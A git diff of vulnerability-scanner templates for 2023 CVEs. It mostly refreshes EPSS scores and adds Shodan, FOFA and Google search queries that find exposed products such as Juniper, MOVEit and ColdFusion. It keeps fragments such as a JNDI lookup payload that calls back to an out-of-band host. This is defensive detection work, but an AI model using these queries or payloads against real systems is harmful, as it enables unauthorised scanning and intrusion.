a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index d5812e686c..5c1031bc35 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -18,14 +18,16 @@ info: cvss-score: 7.5 cve-id: CVE-2023-36144 cwe-id: CWE-862 - epss-score: 0.02858 - epss-percentile: 0.90492 + epss-score: 0.03179 + epss-percentile: 0.91154 cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras product: sg_2404_mr_firmware shodan-query: title:"Intelbras" + fofa-query: title="intelbras" + google-query: intitle:"intelbras" tags: cve2023,cve,intelbras,switch,exposure http: diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index dacbb3caae..6b42a00699 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -18,17 +18,16 @@ info: cvss-score: 7.5 cve-id: CVE-2023-36284 cwe-id: CWE-89 - epss-score: 0.00061 - epss-percentile: 0.24798 + epss-score: 0.00721 + epss-percentile: 0.80577 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: webkul product: qloapps fofa-query: title="QloApps" tags: cve,cve2023,qloapps,sqli - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 51933089f6..88c763a994 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -19,14 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36287 cwe-id: CWE-79 - epss-score: 0.00075 - epss-percentile: 0.30832 + epss-score: 0.0009 + epss-percentile: 0.38405 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: webkul product: qloapps + fofa-query: title="qloapps" tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul http: diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 0e918eae9a..6b7c59e0d6 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -19,14 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36289 cwe-id: CWE-79 - epss-score: 0.00083 - epss-percentile: 0.33945 + epss-score: 0.0009 + epss-percentile: 0.38405 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: webkul product: qloapps + fofa-query: title="qloapps" tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul variables: email: "{{randstr}}@{{rand_base(5)}}.com" diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index e917ea324e..bea9bcc4eb 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-36306 cwe-id: CWE-79 epss-score: 0.00385 - epss-percentile: 0.70371 + epss-percentile: 0.73054 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 28b2667599..214d4132e9 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36346 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39295 + epss-score: 0.00107 + epss-percentile: 0.43313 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 7e0206581a..1d4c47d875 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-36347 cwe-id: CWE-306 - epss-score: 0.00103 - epss-percentile: 0.41216 + epss-score: 0.01502 + epss-percentile: 0.86929 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: vendor: codekop diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index a792bc8dd0..aba9b02418 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -21,14 +21,14 @@ info: cvss-score: 5.3 cve-id: CVE-2023-36844 cwe-id: CWE-473 - epss-score: 0.03926 - epss-percentile: 0.91134 - cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* + epss-score: 0.74086 + epss-percentile: 0.98118 + cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: juniper - product: junos + product: srx100 shodan-query: title:"Juniper Web Device Manager" tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev variables: diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index a8800a4134..8e87afd17d 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-36845 cwe-id: CWE-473 - epss-score: 0.69312 - epss-percentile: 0.97711 + epss-score: 0.96663 + epss-percentile: 0.99636 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" + fofa-query: title="juniper web device manager" + google-query: intitle:"juniper web device manager" tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev http: diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index c6493bc628..e119981f5c 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.1 cve-id: CVE-2023-36934 cwe-id: CWE-89 - epss-score: 0.09049 - epss-percentile: 0.94466 + epss-score: 0.15264 + epss-percentile: 0.95843 cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: progress product: moveit_transfer shodan-query: http.favicon.hash:989289239 + fofa-query: icon_hash=989289239 tags: cve,cve2023,moveit,rce,sqli,intrusive,progress variables: session_cookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 3ade203f7f..5014790749 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3710 cwe-id: CWE-77,CWE-20 - epss-score: 0.75328 - epss-percentile: 0.97883 + epss-score: 0.70969 + epss-percentile: 0.98042 cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: honeywell product: pm43_firmware shodan-query: http.html:"/main/login.lua?pageid=" + fofa-query: body="/main/login.lua?pageid=" tags: cve2023,cve,honeywell,pm43,printer,iot,rce http: diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 23a94dbbbc..716d33643d 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37265 cwe-id: CWE-306 - epss-score: 0.14233 - epss-percentile: 0.95569 + epss-score: 0.04239 + epss-percentile: 0.92256 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index f601503116..a622aebde7 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37266 cwe-id: CWE-287 - epss-score: 0.07286 - epss-percentile: 0.93418 + epss-score: 0.03237 + epss-percentile: 0.91226 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 267e10b816..c33d1b1d78 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-37270 cwe-id: CWE-89 - epss-score: 0.01621 - epss-percentile: 0.86175 + epss-score: 0.02538 + epss-percentile: 0.90171 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: piwigo product: piwigo shodan-query: http.favicon.hash:540706145 + fofa-query: icon_hash=540706145 + google-query: powered by piwigo tags: cve2023,cve,piwigo,sqli,authenticated http: diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 0cb459af4b..008c25c278 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -13,13 +13,14 @@ info: - https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29 - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg - https://jira.xwiki.org/browse/XWIKI-20457 + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-37462 cwe-id: CWE-74 - epss-score: 0.42489 - epss-percentile: 0.96989 + epss-score: 0.56128 + epss-percentile: 0.97681 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 1c2f14d4ef..75a21edba1 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -17,14 +17,17 @@ info: cvss-score: 7.5 cve-id: CVE-2023-37474 cwe-id: CWE-22 - epss-score: 0.04155 - epss-percentile: 0.91315 + epss-score: 0.05882 + epss-percentile: 0.93414 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: copyparty_project product: copyparty + shodan-query: http.title:"copyparty" + fofa-query: title="copyparty" + google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project http: diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index d956cb2bee..84e7faf058 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37580 cwe-id: CWE-79 - epss-score: 0.30373 - epss-percentile: 0.96831 + epss-score: 0.30867 + epss-percentile: 0.96974 cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 6ccd550087..10a859096f 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37629 cwe-id: CWE-434 - epss-score: 0.13221 - epss-percentile: 0.95417 + epss-score: 0.09817 + epss-percentile: 0.94811 cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,6 @@ info: vendor: simple_online_piggery_management_system_project product: simple_online_piggery_management_system tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project - variables: string: "CVE-2023-37629" diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 383af58111..8be52fb07f 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2023-3765 cwe-id: CWE-36 - epss-score: 0.00951 - epss-percentile: 0.82826 + epss-score: 0.01303 + epss-percentile: 0.85869 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve2023,cve,mflow,lfi,huntr,lfprojects http: diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 0dc83540b4..5257ce52bb 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -11,13 +11,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-37679 - http://mirth.com - http://nextgen.com + - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37679 cwe-id: CWE-77 - epss-score: 0.07033 - epss-percentile: 0.93304 + epss-score: 0.07052 + epss-percentile: 0.9396 cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +26,9 @@ info: vendor: nextgen product: mirth_connect shodan-query: title:"mirth connect administrator" - tags: cve2023,cve,nextgen,rce + fofa-query: title="mirth connect administrator" + google-query: intitle:"mirth connect administrator" + tags: packetstorm,cve2023,cve,nextgen,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index d9ffe9ebbf..0e9c7058d9 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37728 cwe-id: CWE-79 - epss-score: 0.00259 - epss-percentile: 0.65066 + epss-score: 0.0035 + epss-percentile: 0.71791 cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: icewarp product: icewarp shodan-query: http.favicon.hash:2144485375 + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve,cve2023,icearp,icewarp,xss http: diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index 79489bac76..5be50160fd 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-37979 cwe-id: CWE-79 epss-score: 0.00085 - epss-percentile: 0.34736 + epss-percentile: 0.3599 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve2023,cve,wpscan,packetstorm,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 8ce4a8ecd9..053ee7a608 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38035 cwe-id: CWE-863 - epss-score: 0.97187 - epss-percentile: 0.99782 + epss-score: 0.97506 + epss-percentile: 0.99983 cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: ivanti product: mobileiron_sentry shodan-query: 'html:"Note: Requires a local Sentry administrative user"' + fofa-query: 'body="note: requires a local sentry administrative user"' tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast variables: oast: "{{interactsh-url}}/?" diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index 742e2bdbf6..bbc05135e8 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38203 cwe-id: CWE-502 - epss-score: 0.517 - epss-percentile: 0.97465 + epss-score: 0.97037 + epss-percentile: 0.99755 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: max-request: 1 @@ -28,8 +28,8 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev - variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/zdfzfd" diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index 2eed763b87..cd108edfd0 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-38205 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.93471 - epss-percentile: 0.99038 + epss-score: 0.922 + epss-percentile: 0.98936 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev http: diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 0e3e21c1d4..3094b803ce 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - https://vuldb.com/?ctiid.235162 - https://vuldb.com/?id.235162 + - https://github.com/1f3lse/taiE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3836 cwe-id: CWE-434 - epss-score: 0.02584 - epss-percentile: 0.89161 + epss-score: 0.02637 + epss-percentile: 0.90348 cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +28,7 @@ info: vendor: dahuasecurity product: smart_parking_management shodan-query: html:"/WPMS/asset" + fofa-query: body="/wpms/asset" zoomeye-query: /WPMS/asset tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity variables: diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index 64bd0a4275..d91014ab9d 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3843 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index f12d8cd284..4a34e6d213 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-38433 cwe-id: CWE-798 - epss-score: 0.0029 - epss-percentile: 0.6843 + epss-score: 0.0031 + epss-percentile: 0.69984 cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index a73a85af29..0233a5617a 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3845 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index 0480cddc9c..1cb514d945 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-3847 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index ccc2641897..2ee27c1645 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3848 cwe-id: CWE-79 - epss-score: 0.00237 - epss-percentile: 0.61873 + epss-score: 0.00235 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index 6e04c0a610..b25bb87869 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3849 cwe-id: CWE-79 - epss-score: 0.00237 - epss-percentile: 0.61873 + epss-score: 0.00235 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 2ad005fee4..0b11d5aa02 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-38501 cwe-id: CWE-79 - epss-score: 0.00271 - epss-percentile: 0.64421 + epss-score: 0.00198 + epss-percentile: 0.57252 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: copyparty_project product: copyparty shodan-query: title:"copyparty" + fofa-query: title="copyparty" + google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project http: diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 0736c3b2bc..15ef4b2699 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -21,8 +21,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-38646 - epss-score: 0.62661 - epss-percentile: 0.97553 + epss-score: 0.91302 + epss-percentile: 0.98865 cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: metabase shodan-query: http.title:"Metabase" fofa-query: app="Metabase" + google-query: intitle:"metabase" tags: cve2023,cve,metabase,oss,rce variables: file: "./plugins/vertica.metabase-driver.jar" diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index 17331d3e27..c959bc28b0 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -18,14 +18,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-38964 cwe-id: CWE-79 - epss-score: 0.00046 - epss-percentile: 0.15636 + epss-score: 0.00071 + epss-percentile: 0.30433 cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: creativeitem product: academy_lms + shodan-query: http.html:"academy lms" fofa-query: body="Academy LMS" tags: cve2023,cve,academylms,xss,creativeitem diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index 4df0a4e64e..a76c9f68a0 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -15,14 +15,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39002 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26117 + epss-score: 0.00071 + epss-percentile: 0.30401 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: opnsense product: opnsense shodan-query: title:"OPNsense" + fofa-query: title="opnsense" + google-query: intitle:"opnsense" tags: cve2023,cve,opnsense,xss,authenticated,rce http: diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 2387e68505..c1d2641c2a 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -21,14 +21,14 @@ info: cvss-score: 7.5 cve-id: CVE-2023-39026 cwe-id: CWE-22 - epss-score: 0.05678 - epss-percentile: 0.9256 - cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:* + epss-score: 0.04279 + epss-percentile: 0.92285 + cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - vendor: filemage - product: filemage + vendor: microsoft + product: windows shodan-query: title:"FileMage" tags: cve2023,cve,packetstorm,lfi,filemage diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 5641a014db..65816e9130 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -10,13 +10,14 @@ info: - https://www.rconfig.com/downloads/rconfig-3.9.4.zip - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_b.md - https://nvd.nist.gov/vuln/detail/CVE-2023-39108 + - https://github.com/zer0yu/CVE_Request classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-39108 cwe-id: CWE-918 - epss-score: 0.01332 - epss-percentile: 0.84573 + epss-score: 0.05213 + epss-percentile: 0.92994 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +25,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr http: diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index c2b4f687cf..69d5a2008e 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-39109 cwe-id: CWE-918 - epss-score: 0.03449 - epss-percentile: 0.91267 + epss-score: 0.05213 + epss-percentile: 0.92994 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfi http: diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index b624b4b962..5161381a08 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-39110 cwe-id: CWE-918 - epss-score: 0.03449 - epss-percentile: 0.91267 + epss-score: 0.05213 + epss-percentile: 0.92994 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr http: diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 2c2df7e7b4..950b60a1cd 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -14,13 +14,15 @@ info: - https://twitter.com/win3zz/status/1694239332465520684 - https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e - 